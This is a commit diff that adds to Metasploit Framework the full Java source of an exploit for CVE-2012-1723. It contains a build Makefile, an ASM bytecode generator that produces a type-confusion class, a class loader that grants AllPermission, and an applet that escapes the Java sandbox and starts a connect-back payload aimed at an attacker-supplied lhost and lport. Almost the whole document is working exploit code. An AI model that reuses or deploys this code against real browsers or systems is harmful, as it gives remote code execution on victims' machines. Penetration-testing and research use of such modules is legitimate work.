Merge branch 'module-cve-2012-1723' of https://github.com/LittleLight…

…LittleFire/metasploit-framework into LittleLightLittleFire-module-cve-2012-1723

external/source/exploits/CVE-2012-1723/Makefile

@@ -0,0 +1,25 @@
+JAR = CVE-2012-1723.jar
+
+ASM = asm-4.0.jar
+LIB = lib
+BIN = bin
+SRC = src
+
+JAVAC = javac -source 1.5 -target 1.5
+
+all:
+	${JAVAC} -cp ${LIB}/${ASM} src/cve1723/Generator.java -d ${LIB}
+	java -cp ${LIB}:${LIB}/${ASM} cve1723.Generator
+	-mkdir ${BIN}
+	-mkdir ${BIN}/cve1723/
+	mv Confuser.class ${BIN}/cve1723/
+	find ${SRC} -not -name 'Generator.java' -name '*.java' -type f -print0 | xargs -0 ${JAVAC} -cp ${BIN} -sourcepath {} -d ${BIN}
+	jar cf ${JAR} -C ${BIN} .
+
+install: ${JAR}
+	cp ${JAR} ../../../../data/exploits
+
+clean:
+	rm -rf ${BIN}
+	-rm ${LIB}/cve1723/Generator.class
+	-rm ${JAR}

external/source/exploits/CVE-2012-1723/src/cve1723/Attacker.java

@@ -0,0 +1,63 @@
+package cve1723;
+
+import java.applet.Applet;
+import java.awt.*;
+import java.io.*;
+import java.net.URL;
+import java.nio.ByteBuffer;
+import java.nio.IntBuffer;
+
+/**
+ * Attacker applet
+ */
+public class Attacker extends Applet {
+    @Override
+    public void init() {
+        super.init();
+
+        final Confuser c = new Confuser();
+        for (int i = 0; i < 100000; i++) {
+            c.confuse(null);
+        }
+
+        try {
+            Thread.sleep(100);
+        } catch (final InterruptedException ie) {
+            //swallow
+        }
+
+        try {
+            final ConfusingClassLoader cl = c.confuse(getClass().getClassLoader());
+            final String names[] = { "msf.x.PayloadX", "msf.x.PayloadX$StreamConnector" };
+            final String paths[] = { "/msf/x/PayloadX.class", "/msf/x/PayloadX$StreamConnector.class" };
+
+            final String port = getParameter("lport");
+            ConfusingClassLoader.defineAndCreate(cl, names, new byte[][] { loadClass(paths[0]), loadClass(paths[1])}, getParameter("data"), getParameter("jar"), getParameter("lhost"), (port == null ? 4444 : Integer.parseInt(port)));
+        } catch (final Exception e) {
+            e.printStackTrace();
+        }
+    }
+
+    private byte[] loadClass(final String name) throws IOException {
+        final ByteArrayOutputStream os = new ByteArrayOutputStream();
+        { // load the payload class
+            final InputStream is = getClass().getResourceAsStream(name);
+            int read;
+            byte[] buffer = new byte[2048];
+
+            while ((read = is.read(buffer, 0, buffer.length)) != -1) {
+                os.write(buffer, 0, read);
+            }
+        }
+
+        return os.toByteArray();
+    }
+
+    @Override
+    public void paint(final Graphics g) {
+        super.paint(g);
+
+        final String tool = System.getSecurityManager() == null ? "null" : System.getSecurityManager().toString();
+        g.drawString(tool, 0, 10);
+    }
+}

external/source/exploits/CVE-2012-1723/src/cve1723/ConfusingClassLoader.java

@@ -0,0 +1,40 @@
+package cve1723;
+
+import java.lang.reflect.Field;
+import java.net.URL;
+import java.security.*;
+import java.security.cert.*;
+import java.security.cert.Certificate;
+import java.util.Enumeration;
+
+/**
+ * Call the protected method
+ */
+public class ConfusingClassLoader extends ClassLoader {
+
+    public static void defineAndCreate(final ConfusingClassLoader cl, final String name[], final byte data[][], final String hexdata, final String jar, final String lhost, final int lport) {
+        try {
+            final Permissions p = new Permissions();
+            p.add(new AllPermission());
+            final ProtectionDomain pd = new ProtectionDomain(new CodeSource(null, new Certificate[0]), p);
+
+            final Class<?> clazz = cl.defineClass(name[0], data[0], 0, data[0].length, pd);
+            cl.defineClass(name[1], data[1], 0, data[1].length, pd);
+
+            final Field payload_data = clazz.getField("data");
+            final Field payload_jar = clazz.getField("jar");
+            final Field payload_lhost = clazz.getField("lhost");
+            final Field payload_lport = clazz.getField("lport");
+
+            payload_data.set(null, hexdata);
+            payload_jar.set(null, jar);
+            payload_lhost.set(null, lhost);
+            payload_lport.set(null, lport);
+
+            clazz.newInstance();
+        } catch (final Exception e) {
+            // swallow
+            e.printStackTrace();
+        }
+    }
+}

external/source/exploits/CVE-2012-1723/src/cve1723/Generator.java

@@ -0,0 +1,132 @@
+package cve1723;
+
+import org.objectweb.asm.*;
+
+import java.io.ByteArrayOutputStream;
+import java.io.FileOutputStream;
+import java.io.IOException;
+import java.io.InputStream;
+import java.nio.*;
+import java.util.Arrays;
+
+import static org.objectweb.asm.Opcodes.*;
+
+/**
+ * CVE-2012-1723
+ */
+public class Generator {
+    public static byte[] generateConfusion() {
+        final String STATIC_FIELD_NAME = "staticTypeA";
+        final String INSTANCE_FIELD_NAME = "instanceTypeB";
+        final String CONFUSE_METHOD_NAME = "confuse";
+        final String CONFUSER_CLASS_NAME = "cve1723/Confuser";
+
+        final String TYPE_A = "Ljava/lang/ClassLoader;";
+        final String TYPE_B = "Lcve1723/ConfusingClassLoader;";
+
+        final ClassWriter cw = new ClassWriter(ClassWriter.COMPUTE_FRAMES | ClassWriter.COMPUTE_MAXS);
+
+        MethodVisitor mv = null;
+        FieldVisitor fv = null;
+
+        cw.visit(V1_5, ACC_PUBLIC | ACC_SUPER, CONFUSER_CLASS_NAME, null, "java/lang/Object", null);
+
+        // static field of type A (ClassLoader)
+        {
+            fv = cw.visitField(ACC_STATIC, STATIC_FIELD_NAME, TYPE_A, null, null);
+            fv.visitEnd();
+        }
+
+        // one hundred fields of type B (ConfusingClassLoader)
+        {
+            for (int i = 0; i < 100; i++) {
+                fv = cw.visitField(ACC_PUBLIC, INSTANCE_FIELD_NAME + i, TYPE_B, null, null);
+                fv.visitEnd();
+            }
+        }
+
+        // constructor
+        {
+            mv = cw.visitMethod(ACC_PUBLIC, "<init>", "()V", null, null);
+            mv.visitCode();
+            mv.visitVarInsn(ALOAD, 0);
+            mv.visitMethodInsn(INVOKESPECIAL, "java/lang/Object", "<init>", "()V");
+            mv.visitInsn(RETURN);
+            mv.visitMaxs(0, 0);
+            mv.visitEnd();
+        }
+
+        // confuse method
+        {
+            mv = cw.visitMethod(ACC_PUBLIC, CONFUSE_METHOD_NAME, "(" + TYPE_A + ")" + TYPE_B, null, null);
+            mv.visitCode();
+            /*
+                aload 1      // push parameter onto stack
+                ifnonnull cont:
+                aconst_null
+                areturn       // quick return
+            cont:
+                getstatic STATIC_FIELD_NAME
+                pop
+                aload 0
+                aload 1
+                putfield STATIC_FIELD_NAME // force this into a non-static field
+
+                // find instance field that's not null
+                aload 0
+                getfield INSTANCE_FIELD_NAME_1
+                ifnull cont2:
+                aload 0
+                getfield INSTANCE_FIELD_NAME_1
+                areturn
+            cont2:
+                ...
+
+                aconst_null
+                areturn
+             */
+
+            // first part
+            mv.visitVarInsn(ALOAD, 1);
+            final Label cont = new Label();
+            mv.visitJumpInsn(IFNONNULL, cont);
+            mv.visitInsn(ACONST_NULL);
+            mv.visitInsn(ARETURN);
+            mv.visitLabel(cont);
+
+            // 2nd part
+            mv.visitFieldInsn(GETSTATIC, CONFUSER_CLASS_NAME, STATIC_FIELD_NAME, TYPE_A);
+            mv.visitInsn(POP);
+            mv.visitVarInsn(ALOAD, 0);
+            mv.visitVarInsn(ALOAD, 1);
+            mv.visitFieldInsn(PUTFIELD, CONFUSER_CLASS_NAME, STATIC_FIELD_NAME, TYPE_A);
+
+            for (int i = 0; i < 100; i++) {
+                mv.visitVarInsn(ALOAD, 0);
+                mv.visitFieldInsn(GETFIELD, CONFUSER_CLASS_NAME, INSTANCE_FIELD_NAME + i, TYPE_B);
+                final Label contN = new Label();
+                mv.visitJumpInsn(IFNULL, contN);
+                mv.visitVarInsn(ALOAD, 0);
+                mv.visitFieldInsn(GETFIELD, CONFUSER_CLASS_NAME, INSTANCE_FIELD_NAME + i, TYPE_B);
+                mv.visitInsn(ARETURN);
+                mv.visitLabel(contN);
+            }
+
+            mv.visitInsn(ACONST_NULL);
+            mv.visitInsn(ARETURN);
+
+            mv.visitMaxs(0, 0);
+            mv.visitEnd();
+        }
+        cw.visitEnd();
+
+        return cw.toByteArray();
+    }
+
+    public static void main(final String args[]) throws Exception {
+        final byte data[] = Generator.generateConfusion();
+        final FileOutputStream fo = new FileOutputStream("Confuser.class");
+        fo.write(data);
+        fo.close();
+    }
+}